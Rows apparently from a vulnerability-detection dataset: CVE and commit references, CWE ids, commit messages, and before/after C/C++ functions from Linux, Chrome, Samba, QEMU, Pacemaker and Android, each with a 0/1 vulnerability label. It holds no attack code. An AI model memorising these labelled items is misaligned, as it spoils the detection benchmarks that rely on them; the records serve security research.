static void __perf_addr_filters_adjust(struct perf_event *event, void *data) { struct perf_addr_filters_head *ifh = perf_event_addr_filters(event); struct vm_area_struct *vma = data; unsigned long off = vma->vm_pgoff << PAGE_SHIFT, flags; struct file *file = vma->vm_file; struct perf_addr_filter *filter; unsigned int restart = 0, count = 0; if (!has_addr_filter(event)) return; if (!file) return; raw_spin_lock_irqsave(&ifh->lock, flags); list_for_each_entry(filter, &ifh->list, entry) { if (perf_addr_filter_match(filter, file, off, vma->vm_end - vma->vm_start)) { event->addr_filters_offs[count] = vma->vm_start; restart++; } count++; } if (restart) event->addr_filters_gen++; raw_spin_unlock_irqrestore(&ifh->lock, flags); if (restart) perf_event_stop(event, 1); }
static void __perf_addr_filters_adjust(struct perf_event *event, void *data) { struct perf_addr_filters_head *ifh = perf_event_addr_filters(event); struct vm_area_struct *vma = data; unsigned long off = vma->vm_pgoff << PAGE_SHIFT, flags; struct file *file = vma->vm_file; struct perf_addr_filter *filter; unsigned int restart = 0, count = 0; if (!has_addr_filter(event)) return; if (!file) return; raw_spin_lock_irqsave(&ifh->lock, flags); list_for_each_entry(filter, &ifh->list, entry) { if (perf_addr_filter_match(filter, file, off, vma->vm_end - vma->vm_start)) { event->addr_filters_offs[count] = vma->vm_start; restart++; } count++; } if (restart) event->addr_filters_gen++; raw_spin_unlock_irqrestore(&ifh->lock, flags); if (restart) perf_event_stop(event, 1); }
C
linux
0
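The locking rule the perf fix applies: when the lock to take is chosen from a pointer read without holding it (event->ctx), re-validate that pointer after acquiring the lock and retry if the object was moved underneath you. A minimal pthread sketch of the read-lock-recheck loop; the names are illustrative, not perf's (build with -pthread).

```c
/* Sketch of the validate-after-lock pattern behind the perf fix above:
 * read the context pointer, lock it, then confirm the event still
 * belongs to that context; otherwise unlock and retry. */
#include <pthread.h>
#include <stdio.h>

struct ctx   { pthread_mutex_t lock; };
struct event { struct ctx *ctx; };

static struct ctx *lock_event_ctx(struct event *ev)
{
    for (;;) {
        struct ctx *c = __atomic_load_n(&ev->ctx, __ATOMIC_ACQUIRE);
        pthread_mutex_lock(&c->lock);
        if (__atomic_load_n(&ev->ctx, __ATOMIC_ACQUIRE) == c)
            return c;                    /* still valid; caller holds lock */
        pthread_mutex_unlock(&c->lock);  /* moved underneath us: retry */
    }
}

int main(void)
{
    struct ctx a = { PTHREAD_MUTEX_INITIALIZER };
    struct event ev = { &a };
    struct ctx *c = lock_event_ctx(&ev);
    puts(c == &a ? "locked the current ctx" : "?");
    pthread_mutex_unlock(&c->lock);
    return 0;
}
```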
null
null
null
https://github.com/chromium/chromium/commit/6c5d779aaf0dec9628da8a20751e95fd09554b14
6c5d779aaf0dec9628da8a20751e95fd09554b14
Move the cancellation of blocked requests code from ResourceDispatcherHost::~ResourceDispatcherHost() to ResourceDispatcherHost::OnShutdown(). This causes the requests to be cancelled on the IO thread rather than the UI thread, which is important since cancellation may delete the URLRequest (and URLRequests should not outlive the IO thread). BUG=39243 Review URL: http://codereview.chromium.org/1213004 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@42575 0039d316-1c4b-4281-b951-d872f2087c98
void ResourceDispatcherHost::OnFollowRedirect( int request_id, bool has_new_first_party_for_cookies, const GURL& new_first_party_for_cookies) { FollowDeferredRedirect(receiver_->id(), request_id, has_new_first_party_for_cookies, new_first_party_for_cookies); }
void ResourceDispatcherHost::OnFollowRedirect( int request_id, bool has_new_first_party_for_cookies, const GURL& new_first_party_for_cookies) { FollowDeferredRedirect(receiver_->id(), request_id, has_new_first_party_for_cookies, new_first_party_for_cookies); }
C
Chrome
0
CVE-2015-1867
https://www.cvedetails.com/cve/CVE-2015-1867/
CWE-264
https://github.com/ClusterLabs/pacemaker/commit/84ac07c
84ac07c
Fix: acl: Do not delay evaluation of added nodes in some situations It is not appropriate when the node has no children as it is not a placeholder
__xml_acl_mode_test(enum xml_private_flags allowed, enum xml_private_flags requested) { if(is_set(allowed, xpf_acl_deny)) { return FALSE; } else if(is_set(allowed, requested)) { return TRUE; } else if(is_set(requested, xpf_acl_read) && is_set(allowed, xpf_acl_write)) { return TRUE; } else if(is_set(requested, xpf_acl_create) && is_set(allowed, xpf_acl_write)) { return TRUE; } else if(is_set(requested, xpf_acl_create) && is_set(allowed, xpf_created)) { return TRUE; } return FALSE; }
__xml_acl_mode_test(enum xml_private_flags allowed, enum xml_private_flags requested) { if(is_set(allowed, xpf_acl_deny)) { return FALSE; } else if(is_set(allowed, requested)) { return TRUE; } else if(is_set(requested, xpf_acl_read) && is_set(allowed, xpf_acl_write)) { return TRUE; } else if(is_set(requested, xpf_acl_create) && is_set(allowed, xpf_acl_write)) { return TRUE; } else if(is_set(requested, xpf_acl_create) && is_set(allowed, xpf_created)) { return TRUE; } return FALSE; }
C
pacemaker
0
CVE-2015-5296
https://www.cvedetails.com/cve/CVE-2015-5296/
CWE-20
https://git.samba.org/?p=samba.git;a=commit;h=a819d2b440aafa3138d95ff6e8b824da885a70e9
a819d2b440aafa3138d95ff6e8b824da885a70e9
null
static NTSTATUS smb2cli_conn_dispatch_incoming(struct smbXcli_conn *conn, TALLOC_CTX *tmp_mem, uint8_t *inbuf) { struct tevent_req *req; struct smbXcli_req_state *state = NULL; struct iovec *iov; int i, num_iov; NTSTATUS status; bool defer = true; struct smbXcli_session *last_session = NULL; size_t inbuf_len = smb_len_tcp(inbuf); status = smb2cli_inbuf_parse_compound(conn, inbuf + NBT_HDR_SIZE, inbuf_len, tmp_mem, &iov, &num_iov); if (!NT_STATUS_IS_OK(status)) { return status; } for (i=0; i<num_iov; i+=4) { uint8_t *inbuf_ref = NULL; struct iovec *cur = &iov[i]; uint8_t *inhdr = (uint8_t *)cur[1].iov_base; uint16_t opcode = SVAL(inhdr, SMB2_HDR_OPCODE); uint32_t flags = IVAL(inhdr, SMB2_HDR_FLAGS); uint64_t mid = BVAL(inhdr, SMB2_HDR_MESSAGE_ID); uint16_t req_opcode; uint32_t req_flags; uint16_t credits = SVAL(inhdr, SMB2_HDR_CREDIT); uint32_t new_credits; struct smbXcli_session *session = NULL; const DATA_BLOB *signing_key = NULL; bool was_encrypted = false; new_credits = conn->smb2.cur_credits; new_credits += credits; if (new_credits > UINT16_MAX) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } conn->smb2.cur_credits += credits; req = smb2cli_conn_find_pending(conn, mid); if (req == NULL) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } state = tevent_req_data(req, struct smbXcli_req_state); req_opcode = SVAL(state->smb2.hdr, SMB2_HDR_OPCODE); if (opcode != req_opcode) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } req_flags = SVAL(state->smb2.hdr, SMB2_HDR_FLAGS); if (!(flags & SMB2_HDR_FLAG_REDIRECT)) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } status = NT_STATUS(IVAL(inhdr, SMB2_HDR_STATUS)); if ((flags & SMB2_HDR_FLAG_ASYNC) && NT_STATUS_EQUAL(status, STATUS_PENDING)) { uint64_t async_id = BVAL(inhdr, SMB2_HDR_ASYNC_ID); if (state->smb2.got_async) { /* We only expect one STATUS_PENDING response */ return NT_STATUS_INVALID_NETWORK_RESPONSE; } state->smb2.got_async = true; /* * async interim responses are not signed, * even if the SMB2_HDR_FLAG_SIGNED flag * is set. */ state->smb2.cancel_flags = SMB2_HDR_FLAG_ASYNC; state->smb2.cancel_mid = 0; state->smb2.cancel_aid = async_id; if (state->smb2.notify_async) { tevent_req_defer_callback(req, state->ev); tevent_req_notify_callback(req); } continue; } session = state->session; if (req_flags & SMB2_HDR_FLAG_CHAINED) { session = last_session; } last_session = session; if (state->smb2.should_sign) { if (!(flags & SMB2_HDR_FLAG_SIGNED)) { return NT_STATUS_ACCESS_DENIED; } } if (flags & SMB2_HDR_FLAG_SIGNED) { uint64_t uid = BVAL(inhdr, SMB2_HDR_SESSION_ID); if (session == NULL) { struct smbXcli_session *s; s = state->conn->sessions; for (; s; s = s->next) { if (s->smb2->session_id != uid) { continue; } session = s; break; } } if (session == NULL) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } last_session = session; signing_key = &session->smb2_channel.signing_key; } if (opcode == SMB2_OP_SESSSETUP) { /* * We prefer the channel signing key, if it is * already there. * * If we do not have a channel signing key yet, * we try the main signing key, if it is not * the final response. */ if (signing_key && signing_key->length == 0 && !NT_STATUS_IS_OK(status)) { signing_key = &session->smb2->signing_key; } if (signing_key && signing_key->length == 0) { /* * If we do not have a session key to * verify the signature, we defer the * signing check to the caller. * * The caller gets NT_STATUS_OK, it * has to call * smb2cli_session_set_session_key() * or * smb2cli_session_set_channel_key() * which will check the signature * with the channel signing key. 
*/ signing_key = NULL; } } if (cur[0].iov_len == SMB2_TF_HDR_SIZE) { const uint8_t *tf = (const uint8_t *)cur[0].iov_base; uint64_t uid = BVAL(tf, SMB2_TF_SESSION_ID); /* * If the response was encrypted in a SMB2_TRANSFORM * pdu, which belongs to the correct session, * we do not need to do signing checks * * It could be the session the response belongs to * or the session that was used to encrypt the * SMB2_TRANSFORM request. */ if ((session && session->smb2->session_id == uid) || (state->smb2.encryption_session_id == uid)) { signing_key = NULL; was_encrypted = true; } } if (NT_STATUS_EQUAL(status, NT_STATUS_USER_SESSION_DELETED)) { /* * if the server returns NT_STATUS_USER_SESSION_DELETED * the response is not signed and we should * propagate the NT_STATUS_USER_SESSION_DELETED * status to the caller. */ state->smb2.signing_skipped = true; signing_key = NULL; } if (NT_STATUS_EQUAL(status, NT_STATUS_INVALID_PARAMETER)) { /* * if the server returns * NT_STATUS_INVALID_PARAMETER * the response might not be encrypted. */ if (state->smb2.should_encrypt && !was_encrypted) { state->smb2.signing_skipped = true; signing_key = NULL; } } if (state->smb2.should_encrypt && !was_encrypted) { if (!state->smb2.signing_skipped) { return NT_STATUS_ACCESS_DENIED; } } if (NT_STATUS_EQUAL(status, NT_STATUS_NETWORK_NAME_DELETED) || NT_STATUS_EQUAL(status, NT_STATUS_FILE_CLOSED) || NT_STATUS_EQUAL(status, NT_STATUS_INVALID_PARAMETER)) { /* * if the server returns * NT_STATUS_NETWORK_NAME_DELETED * NT_STATUS_FILE_CLOSED * NT_STATUS_INVALID_PARAMETER * the response might not be signed * as this happens before the signing checks. * * If server echos the signature (or all zeros) * we should report the status from the server * to the caller. */ if (signing_key) { int cmp; cmp = memcmp(inhdr+SMB2_HDR_SIGNATURE, state->smb2.hdr+SMB2_HDR_SIGNATURE, 16); if (cmp == 0) { state->smb2.signing_skipped = true; signing_key = NULL; } } if (signing_key) { int cmp; static const uint8_t zeros[16]; cmp = memcmp(inhdr+SMB2_HDR_SIGNATURE, zeros, 16); if (cmp == 0) { state->smb2.signing_skipped = true; signing_key = NULL; } } } if (signing_key) { status = smb2_signing_check_pdu(*signing_key, state->conn->protocol, &cur[1], 3); if (!NT_STATUS_IS_OK(status)) { /* * If the signing check fails, we disconnect * the connection. */ return status; } } if (NT_STATUS_EQUAL(status, NT_STATUS_NETWORK_SESSION_EXPIRED) && (session != NULL) && session->disconnect_expired) { /* * this should be a short term hack * until the upper layers have implemented * re-authentication. */ return status; } smbXcli_req_unset_pending(req); /* * There might be more than one response * we need to defer the notifications */ if ((num_iov == 5) && (talloc_array_length(conn->pending) == 0)) { defer = false; } if (defer) { tevent_req_defer_callback(req, state->ev); } /* * Note: here we use talloc_reference() in a way * that does not expose it to the caller. */ inbuf_ref = talloc_reference(state->smb2.recv_iov, inbuf); if (tevent_req_nomem(inbuf_ref, req)) { continue; } /* copy the related buffers */ state->smb2.recv_iov[0] = cur[1]; state->smb2.recv_iov[1] = cur[2]; state->smb2.recv_iov[2] = cur[3]; tevent_req_done(req); } if (defer) { return NT_STATUS_RETRY; } return NT_STATUS_OK; }
static NTSTATUS smb2cli_conn_dispatch_incoming(struct smbXcli_conn *conn, TALLOC_CTX *tmp_mem, uint8_t *inbuf) { struct tevent_req *req; struct smbXcli_req_state *state = NULL; struct iovec *iov; int i, num_iov; NTSTATUS status; bool defer = true; struct smbXcli_session *last_session = NULL; size_t inbuf_len = smb_len_tcp(inbuf); status = smb2cli_inbuf_parse_compound(conn, inbuf + NBT_HDR_SIZE, inbuf_len, tmp_mem, &iov, &num_iov); if (!NT_STATUS_IS_OK(status)) { return status; } for (i=0; i<num_iov; i+=4) { uint8_t *inbuf_ref = NULL; struct iovec *cur = &iov[i]; uint8_t *inhdr = (uint8_t *)cur[1].iov_base; uint16_t opcode = SVAL(inhdr, SMB2_HDR_OPCODE); uint32_t flags = IVAL(inhdr, SMB2_HDR_FLAGS); uint64_t mid = BVAL(inhdr, SMB2_HDR_MESSAGE_ID); uint16_t req_opcode; uint32_t req_flags; uint16_t credits = SVAL(inhdr, SMB2_HDR_CREDIT); uint32_t new_credits; struct smbXcli_session *session = NULL; const DATA_BLOB *signing_key = NULL; bool was_encrypted = false; new_credits = conn->smb2.cur_credits; new_credits += credits; if (new_credits > UINT16_MAX) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } conn->smb2.cur_credits += credits; req = smb2cli_conn_find_pending(conn, mid); if (req == NULL) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } state = tevent_req_data(req, struct smbXcli_req_state); req_opcode = SVAL(state->smb2.hdr, SMB2_HDR_OPCODE); if (opcode != req_opcode) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } req_flags = SVAL(state->smb2.hdr, SMB2_HDR_FLAGS); if (!(flags & SMB2_HDR_FLAG_REDIRECT)) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } status = NT_STATUS(IVAL(inhdr, SMB2_HDR_STATUS)); if ((flags & SMB2_HDR_FLAG_ASYNC) && NT_STATUS_EQUAL(status, STATUS_PENDING)) { uint64_t async_id = BVAL(inhdr, SMB2_HDR_ASYNC_ID); if (state->smb2.got_async) { /* We only expect one STATUS_PENDING response */ return NT_STATUS_INVALID_NETWORK_RESPONSE; } state->smb2.got_async = true; /* * async interim responses are not signed, * even if the SMB2_HDR_FLAG_SIGNED flag * is set. */ state->smb2.cancel_flags = SMB2_HDR_FLAG_ASYNC; state->smb2.cancel_mid = 0; state->smb2.cancel_aid = async_id; if (state->smb2.notify_async) { tevent_req_defer_callback(req, state->ev); tevent_req_notify_callback(req); } continue; } session = state->session; if (req_flags & SMB2_HDR_FLAG_CHAINED) { session = last_session; } last_session = session; if (state->smb2.should_sign) { if (!(flags & SMB2_HDR_FLAG_SIGNED)) { return NT_STATUS_ACCESS_DENIED; } } if (flags & SMB2_HDR_FLAG_SIGNED) { uint64_t uid = BVAL(inhdr, SMB2_HDR_SESSION_ID); if (session == NULL) { struct smbXcli_session *s; s = state->conn->sessions; for (; s; s = s->next) { if (s->smb2->session_id != uid) { continue; } session = s; break; } } if (session == NULL) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } last_session = session; signing_key = &session->smb2_channel.signing_key; } if (opcode == SMB2_OP_SESSSETUP) { /* * We prefer the channel signing key, if it is * already there. * * If we do not have a channel signing key yet, * we try the main signing key, if it is not * the final response. */ if (signing_key && signing_key->length == 0 && !NT_STATUS_IS_OK(status)) { signing_key = &session->smb2->signing_key; } if (signing_key && signing_key->length == 0) { /* * If we do not have a session key to * verify the signature, we defer the * signing check to the caller. * * The caller gets NT_STATUS_OK, it * has to call * smb2cli_session_set_session_key() * or * smb2cli_session_set_channel_key() * which will check the signature * with the channel signing key. 
*/ signing_key = NULL; } } if (cur[0].iov_len == SMB2_TF_HDR_SIZE) { const uint8_t *tf = (const uint8_t *)cur[0].iov_base; uint64_t uid = BVAL(tf, SMB2_TF_SESSION_ID); /* * If the response was encrypted in a SMB2_TRANSFORM * pdu, which belongs to the correct session, * we do not need to do signing checks * * It could be the session the response belongs to * or the session that was used to encrypt the * SMB2_TRANSFORM request. */ if ((session && session->smb2->session_id == uid) || (state->smb2.encryption_session_id == uid)) { signing_key = NULL; was_encrypted = true; } } if (NT_STATUS_EQUAL(status, NT_STATUS_USER_SESSION_DELETED)) { /* * if the server returns NT_STATUS_USER_SESSION_DELETED * the response is not signed and we should * propagate the NT_STATUS_USER_SESSION_DELETED * status to the caller. */ state->smb2.signing_skipped = true; signing_key = NULL; } if (NT_STATUS_EQUAL(status, NT_STATUS_INVALID_PARAMETER)) { /* * if the server returns * NT_STATUS_INVALID_PARAMETER * the response might not be encrypted. */ if (state->smb2.should_encrypt && !was_encrypted) { state->smb2.signing_skipped = true; signing_key = NULL; } } if (state->smb2.should_encrypt && !was_encrypted) { if (!state->smb2.signing_skipped) { return NT_STATUS_ACCESS_DENIED; } } if (NT_STATUS_EQUAL(status, NT_STATUS_NETWORK_NAME_DELETED) || NT_STATUS_EQUAL(status, NT_STATUS_FILE_CLOSED) || NT_STATUS_EQUAL(status, NT_STATUS_INVALID_PARAMETER)) { /* * if the server returns * NT_STATUS_NETWORK_NAME_DELETED * NT_STATUS_FILE_CLOSED * NT_STATUS_INVALID_PARAMETER * the response might not be signed * as this happens before the signing checks. * * If server echos the signature (or all zeros) * we should report the status from the server * to the caller. */ if (signing_key) { int cmp; cmp = memcmp(inhdr+SMB2_HDR_SIGNATURE, state->smb2.hdr+SMB2_HDR_SIGNATURE, 16); if (cmp == 0) { state->smb2.signing_skipped = true; signing_key = NULL; } } if (signing_key) { int cmp; static const uint8_t zeros[16]; cmp = memcmp(inhdr+SMB2_HDR_SIGNATURE, zeros, 16); if (cmp == 0) { state->smb2.signing_skipped = true; signing_key = NULL; } } } if (signing_key) { status = smb2_signing_check_pdu(*signing_key, state->conn->protocol, &cur[1], 3); if (!NT_STATUS_IS_OK(status)) { /* * If the signing check fails, we disconnect * the connection. */ return status; } } if (NT_STATUS_EQUAL(status, NT_STATUS_NETWORK_SESSION_EXPIRED) && (session != NULL) && session->disconnect_expired) { /* * this should be a short term hack * until the upper layers have implemented * re-authentication. */ return status; } smbXcli_req_unset_pending(req); /* * There might be more than one response * we need to defer the notifications */ if ((num_iov == 5) && (talloc_array_length(conn->pending) == 0)) { defer = false; } if (defer) { tevent_req_defer_callback(req, state->ev); } /* * Note: here we use talloc_reference() in a way * that does not expose it to the caller. */ inbuf_ref = talloc_reference(state->smb2.recv_iov, inbuf); if (tevent_req_nomem(inbuf_ref, req)) { continue; } /* copy the related buffers */ state->smb2.recv_iov[0] = cur[1]; state->smb2.recv_iov[1] = cur[2]; state->smb2.recv_iov[2] = cur[3]; tevent_req_done(req); } if (defer) { return NT_STATUS_RETRY; } return NT_STATUS_OK; }
C
samba
0
CVE-2016-5126
https://www.cvedetails.com/cve/CVE-2016-5126/
CWE-119
https://git.qemu.org/?p=qemu.git;a=commit;h=a6b3167fa0e825aebb5a7cd8b437b6d41584a196
a6b3167fa0e825aebb5a7cd8b437b6d41584a196
null
static void iscsi_co_generic_bh_cb(void *opaque) { struct IscsiTask *iTask = opaque; iTask->complete = 1; qemu_bh_delete(iTask->bh); qemu_coroutine_enter(iTask->co, NULL); }
static void iscsi_co_generic_bh_cb(void *opaque) { struct IscsiTask *iTask = opaque; iTask->complete = 1; qemu_bh_delete(iTask->bh); qemu_coroutine_enter(iTask->co, NULL); }
C
qemu
0
CVE-2017-5118
https://www.cvedetails.com/cve/CVE-2017-5118/
CWE-732
https://github.com/chromium/chromium/commit/0ab2412a104d2f235d7b9fe19d30ef605a410832
0ab2412a104d2f235d7b9fe19d30ef605a410832
Inherit CSP when we inherit the security origin This prevents attacks that use main window navigation to get out of the existing CSP constraints, such as the one in the related bug. Bug: 747847 Change-Id: I1e57b50da17f65d38088205b0a3c7c49ef2ae4d8 Reviewed-on: https://chromium-review.googlesource.com/592027 Reviewed-by: Mike West <[email protected]> Commit-Queue: Andy Paicu <[email protected]> Cr-Commit-Position: refs/heads/master@{#492333}
ResizeObserverController& Document::EnsureResizeObserverController() { if (!resize_observer_controller_) resize_observer_controller_ = new ResizeObserverController(); return *resize_observer_controller_; }
ResizeObserverController& Document::EnsureResizeObserverController() { if (!resize_observer_controller_) resize_observer_controller_ = new ResizeObserverController(); return *resize_observer_controller_; }
C
Chrome
0
CVE-2011-4131
https://www.cvedetails.com/cve/CVE-2011-4131/
CWE-189
https://github.com/torvalds/linux/commit/bf118a342f10dafe44b14451a1392c3254629a1f
bf118a342f10dafe44b14451a1392c3254629a1f
NFSv4: include bitmap in nfsv4 get acl data The NFSv4 bitmap size is unbounded: a server can return an arbitrarily sized bitmap in an FATTR4_WORD0_ACL request. Instead of using nfs4_fattr_bitmap_maxsz as a guess at the maximum bitmask returned by a server, include the bitmap (xdr length plus bitmasks) and the acl data xdr length in the (cached) acl page data. This is a general solution to commit e5012d1f "NFSv4.1: update nfs4_fattr_bitmap_maxsz" and fixes hitting a BUG_ON in xdr_shrink_bufhead when getting ACLs. Fix a bug in decode_getacl that returned -EINVAL on ACLs > page when getxattr was called with a NULL buffer, preventing ACLs > PAGE_SIZE from being retrieved. Cc: [email protected] Signed-off-by: Andy Adamson <[email protected]> Signed-off-by: Trond Myklebust <[email protected]>
static void nfs41_sequence_prepare(struct rpc_task *task, void *data) { struct nfs4_sequence_data *calldata = data; struct nfs_client *clp = calldata->clp; struct nfs4_sequence_args *args; struct nfs4_sequence_res *res; args = task->tk_msg.rpc_argp; res = task->tk_msg.rpc_resp; if (nfs41_setup_sequence(clp->cl_session, args, res, 0, task)) return; rpc_call_start(task); }
static void nfs41_sequence_prepare(struct rpc_task *task, void *data) { struct nfs4_sequence_data *calldata = data; struct nfs_client *clp = calldata->clp; struct nfs4_sequence_args *args; struct nfs4_sequence_res *res; args = task->tk_msg.rpc_argp; res = task->tk_msg.rpc_resp; if (nfs41_setup_sequence(clp->cl_session, args, res, 0, task)) return; rpc_call_start(task); }
C
linux
0
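The sizing logic in the commit message above generalizes to a simple rule: derive the reply buffer size from the actual xdr-encoded lengths instead of a compile-time guess such as nfs4_fattr_bitmap_maxsz. Below is a minimal sketch of that arithmetic; the helper name and layout are illustrative assumptions, not the kernel patch, which restructures the nfs4 xdr decode path.

#include <stddef.h>
#include <stdint.h>

/* Space to cache a GETACL reply: one word for the bitmap array length,
 * the bitmap words themselves, one word for the opaque acl length,
 * then the acl bytes. Illustrative layout only. */
static size_t acl_cache_space(uint32_t bitmap_words, size_t acl_len)
{
    return (1 + (size_t)bitmap_words + 1) * sizeof(uint32_t) + acl_len;
}

Because bitmap_words comes from the server, a caller would still cap it against the space it is willing to allocate; the point of the fix is that the length is accounted for rather than assumed bounded.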
null
null
null
https://github.com/chromium/chromium/commit/dcd10462fb49c72544719c490238f3a35edf3fc6
dcd10462fb49c72544719c490238f3a35edf3fc6
Open distiller UI setting through JavaScript This change adds support for opening the android view distiller settings from JavaScript via "distiller.openSettings". To avoid passing numerous objects into the DomDistillerViewerSource, the ExternalFeedbackReporter has been refactored into a generic UI handle that is responsible for any interaction between Chrome and Android specific controls and the distiller component. The actual UI in the page is not yet implemented. BUG= Review URL: https://codereview.chromium.org/1386043002 Cr-Commit-Position: refs/heads/master@{#354123}
void DistillerNativeJavaScript::EnsureServiceConnected() { if (!distiller_js_service_ || !distiller_js_service_.is_bound()) { render_frame_->GetServiceRegistry()->ConnectToRemoteService( mojo::GetProxy(&distiller_js_service_)); } }
void DistillerNativeJavaScript::EnsureServiceConnected() { if (!distiller_js_service_) { render_frame_->GetServiceRegistry()->ConnectToRemoteService( mojo::GetProxy(&distiller_js_service_)); } }
C
Chrome
1
CVE-2016-1621
https://www.cvedetails.com/cve/CVE-2016-1621/
CWE-119
https://android.googlesource.com/platform/external/libvpx/+/5a9753fca56f0eeb9f61e342b2fccffc364f9426
5a9753fca56f0eeb9f61e342b2fccffc364f9426
Merge Conflict Fix CL to lmp-mr1-release for ag/849478 DO NOT MERGE - libvpx: Pull from upstream Current HEAD: 7105df53d7dc13d5e575bc8df714ec8d1da36b06 BUG=23452792 Change-Id: Ic78176fc369e0bacc71d423e0e2e6075d004aaec
void Encoder::EncodeFrame(VideoSource *video, const unsigned long frame_flags) { if (video->img()) EncodeFrameInternal(*video, frame_flags); else Flush(); CxDataIterator iter = GetCxData(); while (const vpx_codec_cx_pkt_t *pkt = iter.Next()) { if (pkt->kind != VPX_CODEC_STATS_PKT) continue; stats_->Append(*pkt); } }
void Encoder::EncodeFrame(VideoSource *video, const unsigned long frame_flags) { if (video->img()) EncodeFrameInternal(*video, frame_flags); else Flush(); CxDataIterator iter = GetCxData(); while (const vpx_codec_cx_pkt_t *pkt = iter.Next()) { if (pkt->kind != VPX_CODEC_STATS_PKT) continue; stats_->Append(*pkt); } }
C
Android
0
CVE-2016-3821
https://www.cvedetails.com/cve/CVE-2016-3821/
CWE-476
https://android.googlesource.com/platform/frameworks/av/+/42a25c46b844518ff0d0b920c20c519e1417be69
42a25c46b844518ff0d0b920c20c519e1417be69
Don't use sp<>& because they may end up pointing to NULL after a NULL check was performed. Bug: 28166152 Change-Id: Iab2ea30395b620628cc6f3d067dd4f6fcda824fe
status_t MediaPlayer::setListener(const sp<MediaPlayerListener>& listener) { ALOGV("setListener"); Mutex::Autolock _l(mLock); mListener = listener; return NO_ERROR; }
status_t MediaPlayer::setListener(const sp<MediaPlayerListener>& listener) { ALOGV("setListener"); Mutex::Autolock _l(mLock); mListener = listener; return NO_ERROR; }
C
Android
0
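The commit message for CVE-2016-3821 above describes a general C++ pitfall: a const reference to a smart pointer that aliases a member can be nulled out between the NULL check and the use. A self-contained sketch of the hazard follows, using std::shared_ptr as a stand-in for Android's sp<> and hypothetical Holder/Listener types.

#include <cstdio>
#include <memory>

struct Listener { void onEvent() { std::puts("event"); } };

struct Holder {
    std::shared_ptr<Listener> listener = std::make_shared<Listener>();

    // 'l' may alias 'listener': the null check can be invalidated by
    // anything that reassigns the member before the use.
    void notifyByRef(const std::shared_ptr<Listener>& l) {
        if (l) {
            listener.reset();   // 'l' now refers to an empty pointer
            // l->onEvent();    // would dereference null despite the check
        }
    }

    // Passing by value takes a strong reference for the whole call.
    void notifyByValue(std::shared_ptr<Listener> l) {
        if (l) {
            listener.reset();   // the copy in 'l' keeps the object alive
            l->onEvent();       // still safe
        }
    }
};

int main() {
    Holder h;
    h.notifyByValue(h.listener);
    return 0;
}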
CVE-2018-6096
https://www.cvedetails.com/cve/CVE-2018-6096/
null
https://github.com/chromium/chromium/commit/36f801fdbec07d116a6f4f07bb363f10897d6a51
36f801fdbec07d116a6f4f07bb363f10897d6a51
If a page calls |window.focus()|, kick it out of fullscreen. BUG=776418, 800056 Change-Id: I1880fe600e4814c073f247c43b1c1ac80c8fc017 Reviewed-on: https://chromium-review.googlesource.com/852378 Reviewed-by: Nasko Oskov <[email protected]> Reviewed-by: Philip Jägenstedt <[email protected]> Commit-Queue: Avi Drissman <[email protected]> Cr-Commit-Position: refs/heads/master@{#533790}
void RenderFrameImpl::LoadNavigationErrorPage( const WebURLRequest& failed_request, const WebURLError& error, bool replace, HistoryEntry* entry, const base::Optional<std::string>& error_page_content) { blink::WebFrameLoadType frame_load_type = entry ? blink::WebFrameLoadType::kBackForward : blink::WebFrameLoadType::kStandard; const blink::WebHistoryItem& history_item = entry ? entry->root() : blink::WebHistoryItem(); if (error.reason() == net::ERR_BLOCKED_BY_RESPONSE) { const blink::WebHistoryItem& blank_history_item = blink::WebHistoryItem(); frame_load_type = blink::WebFrameLoadType::kStandard; LoadNavigationErrorPageInternal("", GURL("data:,"), WebURL(), replace, frame_load_type, blank_history_item); return; } std::string error_html; if (error_page_content.has_value()) { error_html = error_page_content.value(); GetContentClient()->renderer()->PrepareErrorPage(this, failed_request, error, nullptr, nullptr); } else { GetContentClient()->renderer()->PrepareErrorPage( this, failed_request, error, &error_html, nullptr); } LoadNavigationErrorPageInternal(error_html, GURL(kUnreachableWebDataURL), error.url(), replace, frame_load_type, history_item); }
void RenderFrameImpl::LoadNavigationErrorPage( const WebURLRequest& failed_request, const WebURLError& error, bool replace, HistoryEntry* entry, const base::Optional<std::string>& error_page_content) { blink::WebFrameLoadType frame_load_type = entry ? blink::WebFrameLoadType::kBackForward : blink::WebFrameLoadType::kStandard; const blink::WebHistoryItem& history_item = entry ? entry->root() : blink::WebHistoryItem(); if (error.reason() == net::ERR_BLOCKED_BY_RESPONSE) { const blink::WebHistoryItem& blank_history_item = blink::WebHistoryItem(); frame_load_type = blink::WebFrameLoadType::kStandard; LoadNavigationErrorPageInternal("", GURL("data:,"), WebURL(), replace, frame_load_type, blank_history_item); return; } std::string error_html; if (error_page_content.has_value()) { error_html = error_page_content.value(); GetContentClient()->renderer()->PrepareErrorPage(this, failed_request, error, nullptr, nullptr); } else { GetContentClient()->renderer()->PrepareErrorPage( this, failed_request, error, &error_html, nullptr); } LoadNavigationErrorPageInternal(error_html, GURL(kUnreachableWebDataURL), error.url(), replace, frame_load_type, history_item); }
C
Chrome
0
CVE-2016-3751
https://www.cvedetails.com/cve/CVE-2016-3751/
null
https://android.googlesource.com/platform/external/libpng/+/9d4853418ab2f754c2b63e091c29c5529b8b86ca
9d4853418ab2f754c2b63e091c29c5529b8b86ca
DO NOT MERGE Update libpng to 1.6.20 BUG:23265085 Change-Id: I85199805636d771f3597b691b63bc0bf46084833 (cherry picked from commit bbe98b40cda082024b669fa508931042eed18f82)
int main(void) { fprintf(stderr, "pngvalid: no low level write support in libpng, all tests skipped\n"); /* So the test is skipped: */ return SKIP; }
int main(void) { fprintf(stderr, "pngvalid: no low level write support in libpng, all tests skipped\n"); /* So the test is skipped: */ return SKIP; }
C
Android
0
CVE-2014-7908
https://www.cvedetails.com/cve/CVE-2014-7908/
CWE-189
https://github.com/chromium/chromium/commit/b2006ac87cec58363090e7d5e10d5d9e3bbda9f9
b2006ac87cec58363090e7d5e10d5d9e3bbda9f9
Add extra checks to avoid integer overflow. BUG=425980 TEST=no crash with ASAN Review URL: https://codereview.chromium.org/659743004 Cr-Commit-Position: refs/heads/master@{#301249}
